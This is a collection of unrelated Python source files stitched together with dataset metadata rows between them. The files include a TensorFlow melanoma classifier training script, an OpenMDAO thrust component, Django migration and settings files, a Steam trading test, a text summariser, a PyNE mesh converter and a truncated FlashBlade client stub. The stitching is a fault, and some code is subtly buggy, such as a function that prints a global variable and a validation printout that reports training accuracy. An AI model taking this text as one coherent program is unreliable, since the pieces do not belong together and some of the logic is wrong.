        tf.summary.histogram('Fully connected layers/output', softmax_linear)
    y_pred_cls = tf.argmax(softmax_linear, axis=1)
    return softmax_linear, y_pred_cls
def variable_with_weight_decay(name, shape, stddev, wd):
    """Create a truncated-normal variable; if ``wd`` is not None, add an L2
    penalty (wd * l2_loss(var)) to the 'losses' graph collection.

    NOTE(review): duplicates the helper nested inside core_model; consider
    keeping only one copy.
    """
    dtype = tf.float32
    var = variable_on_cpu( name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
    if wd is not None:
        weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
        tf.add_to_collection('losses', weight_decay)
    return var
def variable_on_cpu(name, shape, initializer):
    """Create (or reuse, under variable scoping) a variable pinned to host
    memory so all GPU towers share a single copy."""
    with tf.device('/cpu:0'):
        dtype = tf.float32
        var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
    return var
def average_gradients(tower_grads):
    """Average gradients across GPU towers.

    ``tower_grads`` is a list (one entry per GPU) of lists of
    (gradient, variable) pairs as returned by Optimizer.compute_gradients.
    Returns one such list where each gradient is the mean over towers; this
    is the synchronisation point of the multi-GPU setup.
    """
    average_grads = []
    for grad_and_vars in zip(*tower_grads):
        # Note that each grad_and_vars looks like the following:
        # ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
        grads = []
        for g, _ in grad_and_vars:
            # Add 0 dimension to the gradients to represent the tower.
            expanded_g = tf.expand_dims(g, 0)
            # Append on a 'tower' dimension which we will average over below.
            grads.append(expanded_g)
        # Average over the 'tower' dimension.
        grad = tf.concat(axis=0, values=grads)
        grad = tf.reduce_mean(grad, 0)
        # Keep in mind that the Variables are redundant because they are shared
        # across towers. So .. we will just return the first tower's pointer to
        # the Variable.
        v = grad_and_vars[0][1]
        grad_and_var = (grad, v)
        average_grads.append(grad_and_var)
    return average_grads
def predict_valid(show_confusion_matrix=False):
    '''
    Run the model over the whole validation set and print accuracy, the
    per-class confusion matrix, AUC, F1 and average precision.

    Relies on module-level globals: loader, sess, num_iterations, _BATCH_SIZE.
    NOTE(review): show_confusion_matrix is accepted but never used; the
    confusion matrix is always printed.
    '''
    images_valid = tf.placeholder(tf.float32, shape=[None , 224*224*3])
    labels_valid = tf.placeholder(tf.float32, shape=[None , 2])
    valid_x, valid_y, valid_l = loader.getValidationDataForClassificationMelanoma()
    valid_count = len(valid_x)
    # Shuffling does not change the aggregate metrics; kept from the original.
    shuffle_order = [i for i in range(valid_count)]
    random.shuffle(shuffle_order)
    # print(shuffle_order)
    print("iterations {}".format(num_iterations))
    valid_x = valid_x[shuffle_order].reshape(valid_count, -1)
    valid_y = valid_y[shuffle_order].reshape(valid_count, -1)
    i = 0
    y_pred = np.zeros(shape=len(valid_x), dtype=np.int)
    # NOTE(review): this builds a fresh copy of the network ops in the current
    # default graph each call -- confirm the variable scope is set up for
    # reuse before calling, or variables will be duplicated.
    output, y_pred_class = core_model(images_valid, labels_valid, _NUM_CLASSES)
    # Predict in _BATCH_SIZE chunks to bound memory use.
    while i < len(valid_x):
        j = min(i + _BATCH_SIZE, len(valid_x))
        batch_xs = valid_x[i:j, :]
        batch_ys = valid_y[i:j, :]
        y_pred[i:j] = sess.run(y_pred_class, feed_dict={images_valid: batch_xs, labels_valid: batch_ys})
        i = j
    correct = (np.argmax(valid_y, axis=1) == y_pred)
    acc = correct.mean() * 100
    correct_numbers = correct.sum()
    print("Accuracy on Valid-Set: {0:.2f}% ({1} / {2})".format(acc, correct_numbers, len(valid_x)))
    y_true = np.argmax(valid_y, axis=1)
    cm = metrics.confusion_matrix(y_true=y_true, y_pred=y_pred)
    for i in range(_NUM_CLASSES):
        class_name = "({}) {}".format(i, valid_l[i])
        print(cm[i, :], class_name)
    class_numbers = [" ({0})".format(i) for i in range(_NUM_CLASSES)]
    print("".join(class_numbers))
    auc = metrics.roc_auc_score(y_true, y_pred)
    print("Auc on Valid Set: {}".format(auc))
    f1_score = metrics.f1_score(y_true, y_pred)
    print("F1 score: {}".format(f1_score))
    average_precision = metrics.average_precision_score(y_true, y_pred)
    print("average precsion on valid: {}".format(average_precision))
    # Per-class false positives / false negatives / true positives / negatives.
    # NOTE(review): computed but never used or returned.
    FP = cm.sum(axis=0) - np.diag(cm)
    FN = cm.sum(axis=1) - np.diag(cm)
    TP = np.diag(cm)
    TN = cm.sum() - (FP + FN + TP)
    return
tf.reset_default_graph()
with tf.Graph().as_default(), tf.device('/cpu:0'):
    # Variables and gradient averaging live on the CPU; each tower below
    # computes its loss and gradients on its own GPU.
    loader = data_loader.DataReaderISIC2017(_BATCH_SIZE, _EPOCHS, gpu_nums)
    train_x, train_y, train_l = loader.getTrainDataForClassificationMelanoma()
    num_iterations = loader.iterations
    print("Iterations {}".format(num_iterations))
    total_count = loader.total_train_count
    step_local = int(math.ceil(_EPOCHS * total_count / _BATCH_SIZE))
    global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
    optimizer = tf.train.GradientDescentOptimizer(learning_rate)
    images = tf.placeholder(tf.float32, shape=[None, 224*224*3])
    labels = tf.placeholder(tf.float32, shape=[None, 2])
    # Fed at run time so the same graph serves both the training feed
    # (_BATCH_SIZE) and the validation feed (_BATCH_SIZE_VALID).
    batch_size_gpu = tf.placeholder(tf.int32)
    tower_grads = []
    losses = []
    y_pred_classes = []
    for i in range(gpu_nums):
        with tf.device('/gpu:{}'.format(i)):
            with tf.name_scope("tower_{}".format(i)) as scope:
                # Each tower consumes its own contiguous slice of the batch.
                per_gpu_count = batch_size_gpu
                start = i * per_gpu_count
                end = start + per_gpu_count
                output, y_pred_class = core_model(images[start:end,:],labels[start:end,:], _NUM_CLASSES)
                loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=labels[start:end,:]))
                #losses = tf.get_collection('losses', scope)
                # Calculate the total loss for the current tower.
                #loss = tf.add_n(losses, name='total_loss')
                losses.append(loss)
                # Reuse variables for the next tower.
                tf.get_variable_scope().reuse_variables()
                grads = optimizer.compute_gradients(loss)
                # Keep track of the gradients across all towers.
                tower_grads.append(grads)
                y_pred_classes.append(y_pred_class)
    # We must calculate the mean of each gradient. Note that this is the
    # synchronization point across all towers.
    grads = average_gradients(tower_grads)
    apply_gradient_op = optimizer.apply_gradients(grads, global_step=global_step)
    losses_mean = tf.reduce_mean(losses)
    y_pred_classes_op=tf.reshape(tf.stack(y_pred_classes, axis=0),[-1])
    correct_prediction = tf.equal(y_pred_classes_op, tf.argmax(labels, axis=1))
    batch_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    # variable_averages = tf.train.ExponentialMovingAverage(
    #     MOVING_AVERAGE_DECAY, global_step)
    # variables_averages_op = variable_averages.apply(tf.trainable_variables())
    # Group all updates to into a single train op.
    # train_op = tf.group(apply_gradient_op, variables_averages_op)
    train_op = apply_gradient_op
    # Start running operations on the Graph. allow_soft_placement must be set to
    # True to build towers on GPU, as some of the ops do not have GPU
    # implementations.
    start = time.time()
    # saver = tf.train.Saver(tf.all_variables())
    saver = tf.train.Saver(tf.all_variables())
    init = tf.initialize_all_variables()
    saver = tf.train.Saver()
    sess = tf.Session(config=tf.ConfigProto(
        allow_soft_placement=True,
        log_device_placement=True))
    train_writer = tf.summary.FileWriter(_SAVE_PATH, sess.graph)
    # Resume from the latest checkpoint when one exists; otherwise start fresh.
    try:
        print("Trying to restore last checkpoint ...")
        last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=_SAVE_PATH)
        saver.restore(sess, save_path=last_chk_path)
        print("Restored checkpoint from:", last_chk_path)
    except:
        print("Failed to restore checkpoint. Initializing variables instead.")
        sess.run(tf.global_variables_initializer())
    step_global = sess.run(global_step)
    step_local = int(math.ceil(_EPOCHS * total_count / _BATCH_SIZE))
    # NOTE(review): epochs-done is derived from _BATCH_SIZE, not from the
    # iterations-per-epoch count -- confirm this resume arithmetic is intended.
    epoch_done = int(math.ceil(step_global / (_BATCH_SIZE)))
    print("global:{}, local: {}, epochs done {}".format(step_global, step_local, epoch_done))
    if step_local < step_global:
        print("Training steps completed: global: {}, local: {}".format(step_global, step_local))
        exit()
    #predict_valid()
    for epoch in range(epoch_done,_EPOCHS ):
        #print(total_count)
        # Re-shuffle the whole training set at the start of every epoch.
        shuffle_order=[i for i in range(total_count)]
        random.shuffle(shuffle_order)
        #print(shuffle_order)
        print("iterations {}".format(num_iterations))
        train_x = train_x[shuffle_order].reshape(total_count, -1)
        train_y = train_y[shuffle_order].reshape(total_count, -1)
        # this mehod is suitable when we load all training data in memory at once.
        lastEpoch=0
        for i in range(num_iterations):
            #print(num_iterations+_BATCH_SIZE)
            #print(loader.total_train_count)
            # Each iteration consumes _BATCH_SIZE examples per GPU.
            startIndex = _BATCH_SIZE * i * gpu_nums
            endIndex = min(startIndex + _BATCH_SIZE * gpu_nums, total_count )
            #print("epoch:{}, iteration:{}, start:{}, end:{} ".format(epoch, i, startIndex, endIndex))
            batch_xs = train_x[startIndex:endIndex,:]
            batch_ys = train_y[startIndex:endIndex,:]
            #print("feed data shape {} , {}".format(batch_xs.shape, batch_ys.shape))
            #print(batch_ys)
            start_time = time.time()
            _,step_global_out, loss_out, batch_accuracy_out = sess.run([train_op,global_step, losses_mean, batch_accuracy], feed_dict={batch_size_gpu:_BATCH_SIZE,images: batch_xs, labels: batch_ys})
            # NOTE(review): unary plus -- ``steps`` is just ``i`` and is unused.
            steps = + i
            if (i % 5 == 0) or (i == _EPOCHS * total_count - 1):
                #print("train epoch: {}, iteration: {}, Accuracy: {}, loss: {}".format(epoch, i, batch_accuracy_out, loss_out ))
                duration = time.time() - start_time
                #msg = "Epoch: {0:}, Global Step: {1:>6}, accuracy: {2:>6.1%}, loss = {3:.2f} ({4:.1f} examples/sec, {5:.2f} sec/batch)"
                #print(msg.format(epoch,step_global, batch_acc, _loss, _BATCH_SIZE / duration, duration))
            if i!=0 and epoch!=lastEpoch:
                # Once per epoch: evaluate the validation data on the same graph.
                lastEpoch=epoch
                valid_x, valid_y, valid_l = loader.getValidationDataForClassificationMelanoma()
                total_count_valid = len(valid_x)
                startIndex = 0 # for validation there is just
                endIndex = min(startIndex + _BATCH_SIZE_VALID * gpu_nums, total_count_valid)
                # all variable should have a idffierent name.
                step_global_out, batch_accuracy_valid_out = sess.run([global_step, batch_accuracy],
                                                                     feed_dict={batch_size_gpu:_BATCH_SIZE_VALID,images: valid_x, labels: valid_y})
                # NOTE(review): this prints the *training* batch accuracy
                # (batch_accuracy_out); batch_accuracy_valid_out is unused.
                print("valid epoch: {}, iteration: {}, Accuracy: {}".format(epoch, i, batch_accuracy_out ))
                # batch_xs = valid_x[startIndex:endIndex, :]
                # batch_ys = valid_y[startIndex:endIndex, :]
                # print("feed data shape for validation {} , {}".format(batch_xs.shape, batch_ys.shape))
                # # print(batch_ys)
                #
                # start_time = time.time()
                # step_global_out, loss_out, y_pred_out = sess.run([global_step, losses, y_pred_classes],
                #                                                  feed_dict={images: batch_xs, labels: batch_ys})
                # y_pred = np.asarray(y_pred_out).reshape(-1)
                # correct = (np.argmax(valid_y, axis=1) == y_pred)
                # acc = correct.mean() * 100
                # correct_numbers = correct.sum()
                # print("Accuracy on Valid-Set: {0:.2f}% ({1} / {2})".format(acc, correct_numbers, len(valid_x)))
            #print("Saving checkpoint............")
            #saver.save(sess, save_path=_SAVE_PATH, global_step=global_step)
        #predict_valid()
        # if (step_global % 100 == 0) or (i == _EPOCHS * total_count - 1):
        #     data_merged, global_1 = sess.run([merged, global_step], feed_dict={x: batch_xs, y: batch_ys})
        #     #acc = predict_test()
        #
        #     # summary = tf.Summary(value=[
        #     #     tf.Summary.Value(tag="Accuracy/test", simple_value=acc),
        #     # ])
        #     # train_writer.add_summary(data_merged, global_1)
        #     # train_writer.add_summary(summary, global_1)
        #
"milton.2002@yahoo.com"
] | milton.2002@yahoo.com |
f9783dda5c1663e07679d767cb045a425f767f67 | 4d5adf020161db482e24ebe353c70567bb14a1a1 | /propulsion/thrust_force.py | d428164ff1452e54121c2c0d3d3b5d6b1f3b8a11 | [] | no_license | leamichel97/prop-solid | 1403b9abd6a73fda6906dfe5de5543e59d2508ad | c81bf700ee07b304d550c47a5afa85e476ecb38d | refs/heads/master | 2022-12-18T12:50:54.042165 | 2020-09-03T10:16:46 | 2020-09-03T10:16:46 | 253,484,751 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | # -*- coding: utf-8 -*-
"""
thrust_force.py generated by WhatsOpt 1.10.1
"""
import numpy as np
from propulsion.thrust_force_base import ThrustForceBase
class ThrustForce(ThrustForceBase):
""" An OpenMDAO component to encapsulate ThrustForce discipline """
def compute(self, inputs, outputs):
""" ThrustForce computation """
if self._impl:
# Docking mechanism: use implementation if referenced in .whatsopt_dock.yml file
self._impl.compute(inputs, outputs)
else:
Ae = inputs['Ae']
Pa = inputs['Pa']
Pe = inputs['Pe']
prop_m = inputs['prop_m']
Ve = inputs['Ve']
zeta = inputs['zeta']
F_T = zeta * ((prop_m * Ve) + (Ae * (Pe - Pa)))
outputs['F_T'] = F_T
return outputs
# Reminder: inputs of compute()
#
# inputs['Ae'] -> shape: (1,), type: Float
# inputs['Pa'] -> shape: (1,), type: Float
# inputs['Pe'] -> shape: (1,), type: Float
# inputs['prop_m'] -> shape: (1,), type: Float
# inputs['Ve'] -> shape: (1,), type: Float
# inputs['zeta'] -> shape: (1,), type: Float
# To declare partial derivatives computation ...
#
# def setup(self):
# super(ThrustForce, self).setup()
# self.declare_partials('*', '*')
#
# def compute_partials(self, inputs, partials):
# """ Jacobian for ThrustForce """
#
# partials['F_T', 'Ae'] = np.zeros((1, 1))
# partials['F_T', 'Pa'] = np.zeros((1, 1))
# partials['F_T', 'Pe'] = np.zeros((1, 1))
# partials['F_T', 'prop_m'] = np.zeros((1, 1))
# partials['F_T', 'Ve'] = np.zeros((1, 1))
# partials['F_T', 'zeta'] = np.zeros((1, 1))
| [
"leamichel1497@gmail.com"
] | leamichel1497@gmail.com |
23fbea60c2bea452a414dcf5f255cd4eabdab38a | 437e905d8c214dc25c559b1dc03eaf9f0c85326f | /is28/vyacheslavleva28/lab6/function.py | 1522faa137dc1fcb8f84d4cc4b96a551fd47870d | [] | no_license | AnatolyDomrachev/karantin | 542ca22c275e39ef3491b1c0d9838e922423b5a9 | 0d9f60207e80305eb713fd43774e911fdbb9fbad | refs/heads/master | 2021-03-29T03:42:43.954727 | 2020-05-27T13:24:36 | 2020-05-27T13:24:36 | 247,916,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | def vvod():
a = []
for i in range(10):
x = float(input())
a.append(x)
return a
def rachet(a):
res = True
for i in range(0,len(a)-1):
if a[i]> a[i+1]:
res = False
return res
def vyvod(data):
print(result)
data = vvod()
print(data)
result = rachet(data)
print(result)
vyvod(result)
print(vyvod) | [
"you@example.com"
] | you@example.com |
6b7bcedc92889fdfac3fae2f3865e4e431ac3a06 | c381e484986b08022be508f285cc142017680319 | /mycats.py | 6c7f2ff8b22648624d73da15fc6a121f54af7a82 | [] | no_license | kasalak/automate-the-boring-stuff | 1060d4919f23b25c6653fd55ef09c436bb7ea2bd | e205bac5cd629f52af11e5ace6475e764612498e | refs/heads/master | 2021-01-21T13:53:14.332726 | 2016-05-10T17:24:04 | 2016-05-10T17:24:04 | 51,721,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | mypets = ['Zophie', 'Pooka', 'Fat-tail']
print('Enter a pet name: ')
name = input()
if name not in mypets:
print('I do not have a pet named ' + name)
else:
print(name + ' is my pet.x`')
| [
"karthik.kasala@gmail.com"
] | karthik.kasala@gmail.com |
e7a3ca9fa15a77897aa6fde5e7b69ee9bb2f853d | ac350894488b34318c11a65d35a0f8fdf69b7d50 | /products/migrations/0001_initial.py | 545343aa9abd1f1393c114e71c6c8e1aed73463f | [] | no_license | phrac/onemgin | 508f052304ddbc03f45e994ebe33769ae30d9336 | 7a029dbca1bd2725ceabc0741c7cfb47290aadb7 | refs/heads/master | 2021-01-16T19:31:10.929508 | 2015-09-08T23:53:43 | 2015-09-08T23:53:43 | 12,391,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,083 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Barcode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image', models.FileField(null=True, upload_to=b'barcodes/ean13/')),
],
),
migrations.CreateModel(
name='BarcodeType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('onemg', models.CharField(unique=True, max_length=13)),
('ean', models.CharField(unique=True, max_length=13)),
('upc', models.CharField(unique=True, max_length=12)),
('jan', models.CharField(max_length=13, null=True)),
('gtin', models.CharField(max_length=14, null=True)),
('nsn', models.CharField(max_length=14, null=True)),
('isbn10', models.CharField(max_length=10, null=True)),
('isbn13', models.CharField(max_length=13, null=True)),
('asin', models.CharField(max_length=10, null=True)),
('brand', models.CharField(max_length=128, null=True)),
('manufacturer', models.CharField(max_length=128, null=True)),
('mpn', models.CharField(max_length=64, null=True)),
('part_number', models.CharField(max_length=64, null=True)),
('sku', models.CharField(max_length=64, null=True)),
('model_number', models.CharField(max_length=64, null=True)),
('length', models.FloatField(null=True)),
('width', models.FloatField(null=True)),
('height', models.FloatField(null=True)),
('weight', models.FloatField(null=True)),
('description', models.CharField(max_length=512, null=True)),
('image_url', models.CharField(max_length=512, null=True)),
('amazon_url', models.URLField(null=True)),
('created', models.DateTimeField(auto_now_add=True, null=True)),
],
),
migrations.AddField(
model_name='barcode',
name='product',
field=models.ForeignKey(to='products.Product'),
),
migrations.AddField(
model_name='barcode',
name='type',
field=models.ForeignKey(to='products.BarcodeType'),
),
migrations.AlterUniqueTogether(
name='barcode',
unique_together=set([('product', 'type')]),
),
]
| [
"derek@disflux.com"
] | derek@disflux.com |
5d8cfdb679b337f26330b1c109a88a1680180caf | d569476dd95496339c34b231621ff1f5dfd7fe49 | /PyTest/SteamSender/tests/test_send_cards.py | 996577a1586476bfeec33e7f74f1ba41cfd2b17e | [] | no_license | monteua/Tests | 10f21f9bae027ce1763c73e2ea7edaf436140eae | 553e5f644466683046ea180422727ccb37967b98 | refs/heads/master | 2021-01-23T10:28:49.654273 | 2018-05-09T09:11:30 | 2018-05-09T09:11:30 | 93,061,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 494 | py | from PageObject.SteamActions import SteamHome
from accounts import accounts
accounts_list = accounts()
def test_send_trade(driver):
for login in accounts_list:
if login == 'monte_ua13':
password = ""
else:
password = ""
SteamHome(driver).open_browser()
SteamHome(driver).enter_credentials(login, password)
SteamHome(driver).pass_steam_guard()
SteamHome(driver).open_trade_url()
SteamHome(driver).log_off()
| [
"arximed.monte@gmail.com"
] | arximed.monte@gmail.com |
72dc217f031f0e0fe7fb784bc8ac8024f1dc926e | 340d83cbefd7a9c88b18ff25f6f5dd90e1131ad6 | /setup.py | 54baf8251ca1cb7f55ed33f6ffb2465951c6bfb5 | [
"MIT"
] | permissive | PTC-CMC/calculator | 50304326acfd501a6503d59ad81cc3502b21d934 | e89ab40336ebe57e3a2c272281f9160a212e7055 | refs/heads/master | 2022-10-03T19:21:48.502774 | 2020-06-04T19:54:30 | 2020-06-04T19:54:30 | 269,222,035 | 0 | 5 | MIT | 2020-06-04T19:54:31 | 2020-06-04T00:17:00 | Python | UTF-8 | Python | false | false | 232 | py | from setuptools import setup
# Originally an idea and implementation by Matt Thompson
# https://github.com/mattwthompson/calculator
setup(
name='Calculator',
version='0.0',
packages=['calculator',],
license='MIT',
)
| [
"justin.b.gilmer@vanderbilt.edu"
] | justin.b.gilmer@vanderbilt.edu |
de7e14bb4a48b4fa23f12d9b6ee34dd226ad6ecb | 843af55f35c54d85bf6006ccf16c79d9a5451285 | /25 - more_lists.py | 8af52312523c5eb4245f871af28a73e7de55b267 | [] | no_license | estebantoso/curso_python_udemy | 2a5989351921d54394b61df1e8089c58088a01cc | 0f4deba3b0efbc59159aaeb49ffd95c6724c2dd2 | refs/heads/master | 2020-05-22T19:00:36.599701 | 2019-05-23T14:49:31 | 2019-05-23T14:49:31 | 186,485,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | friends = ["A", "B", "C"]
print(friends[0])
print(friends[-1])
print("A" in friends) | [
"estebantoso@gmail.com"
] | estebantoso@gmail.com |
491dc44ae36dbbbd2a8115d6c4c80ac79186d685 | 5ec09f479c7a680f77d2b8e5da675e24daf82da7 | /callback_plugins/fix_ssl.py | 330fc989837e7a72fe813929f80bb61a65438884 | [] | no_license | tbuchi888/vagrant-yaml-ansible | 1f2d3bcb5d35d3d1e72c1cda2730bc761d33e812 | 0837e62a3a835d94cb9200160548034f26e3a991 | refs/heads/master | 2021-01-10T02:52:51.389484 | 2016-03-19T16:05:58 | 2016-03-19T16:05:58 | 54,269,456 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | import ssl
if hasattr(ssl, '_create_default_https_context') and hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
class CallbackModule(object):
pass
| [
"tbuchi888@users.noreplay.github.com"
] | tbuchi888@users.noreplay.github.com |
ce65095ee46c58e871cd6b80c4cfe769ace6e7a1 | f5f7f8d12956e4bff6e1c5f6fab10b006690f195 | /luffy/settings.py | fe7c34ae1af2839496be8ef590c0c49e0a16121b | [] | no_license | chenrun666/luffy | 1fbee911d1d7f86e5c7b1ed7f47e84f6f1ee9846 | 59f6229e16978ab9c40ef948807c717c2cddaea9 | refs/heads/master | 2020-04-07T16:09:20.306754 | 2018-11-21T08:45:29 | 2018-11-21T08:45:29 | 158,517,404 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,582 | py | """
Django settings for luffy project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h*zthsj)s$^_5kxkdbk+^gy2ih+vh6kpw#wu$uy^0bce((+k)9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'course.apps.CourseConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'course.mymiddleware.accessmiddleware.CrossDomainMiddleWare',
]
ROOT_URLCONF = 'luffy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'luffy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
# "PASSWORD": "密码",
}
}
}
| [
"17610780919@163.com"
] | 17610780919@163.com |
6d99627b90704b1feee0b966f1164aaffdfc291c | ad0e6decddcbd6bafce08075c04fcc5d1824513e | /abs_try.py | 50b59bf80a1f14f6df5525812e0a4ffb13972103 | [] | no_license | sihanj/nlp_test2 | dc95cf087dfd9a799e83a7fb4d8b543e51153dcc | 4cd10b90ebe19724fa17f254be62574bb069987a | refs/heads/master | 2020-03-25T20:54:16.004753 | 2019-04-22T04:46:05 | 2019-04-22T04:46:05 | 144,150,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | import re
import jieba
import networkx as nx
from sklearn import feature_extraction
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
#分句
def cut_sentence(sentence):
if not isinstance(sentence,str):
sentence=sentence.decode('utf-8')
delimiters=frozenset(u'。?!')
buf=[]
for ch in sentence:
buf.append(ch)
if delimiters.__contains__(ch):
yield ''.join(buf)
buf=[]
if buf:
yield ''.join(buf)
#停用词
def load_stopwords(path='stopwords.txt'):
with open(path,encoding='utf-8') as f:
stopwords=filter(lambda x:x,map(lambda x:x.strip(),f.readlines()))
#stopwords.extend([' ','\t','\n'])
return frozenset(stopwords)
#分词
def cut_words(sentence):
stopwords=load_stopwords()
return filter(lambda x: not stopwords.__contains__(x),jieba.cut(sentence))
#摘要
def get_abstract(content,size=3):
docs=list(cut_sentence(content))
tfidf_model=TfidfVectorizer(tokenizer=jieba.cut,stop_words=load_stopwords())
tfidf_matrix=tfidf_model.fit_transform(docs)
normalized_matrix=TfidfTransformer().fit_transform(tfidf_matrix)
similarity=nx.from_scipy_sparse_matrix(normalized_matrix*normalized_matrix.T)
scores=nx.pagerank(similarity)
tops=sorted(scores.items(),key=lambda x:x[1],reverse=True)
size=min(size,len(docs))
indices=list(map(lambda x:x[0],tops))[:size] #list
return map(lambda idx:docs[idx],indices)
a=input('请输入文档:')
a= re.sub(u'[ , ]',u'',a)
print('摘要为:')
abs=[]
for i in get_abstract(a):
abs.append(i)
print(str(abs).replace("'",'').replace(",",'').replace(" ","").replace("[","").replace("]",""))
input('任意键退出程序') | [
"noreply@github.com"
] | sihanj.noreply@github.com |
8e1342c5a5fb325ae9a8dd315f48ea850dd6e3fb | 9f9fa056d9f9a9a1671fd76009aaabeef9ce58d6 | /output/wwinp_plot.py | a64392e3395afc046326b7dcf81e4ff7429f873d | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | py1sl/pyne_based_tools | 8a6f9172125bcf24698d2c3d0a3ef5b493eaea1c | 92bd8865b9e9de78d24a2e635e0f2e826bad5e61 | refs/heads/master | 2021-01-19T03:13:11.600946 | 2017-09-12T09:49:35 | 2017-09-12T09:49:35 | 55,595,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | from pyne import mcnp
from itaps import iBase, iMesh
import h5py
import sys
from subprocess import call
def convert_wwinp(argv):
"""simple conversion of wwinp to vtk via h5m """
in_path = argv[0]
out_path = argv[1]
wwinp_mesh = mcnp.Wwinp()
wwinp_mesh.read_wwinp(in_path)
wwinp_mesh.mesh.save(out_path+".h5m")
call(["expand_tags.py", out_path+".h5m" , "-o", out_path+".vtk"])
call(["rm", out_path+".h5m"])
if __name__ == "__main__":
convert_wwinp(sys.argv[1:])
| [
"steven.lilley@stfc.ac.uk"
] | steven.lilley@stfc.ac.uk |
06aae58ab947c90ed7bc942a02ffa420afd0287b | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flashblade/FB_2_6/models/network_interface_trace_get_response.py | 711d740178ee303c6379e1c1ec389c67bd15cca7 | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 4,335 | py | # coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.6, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_6 import models
class NetworkInterfaceTraceGetResponse(object):
"""
Attributes:
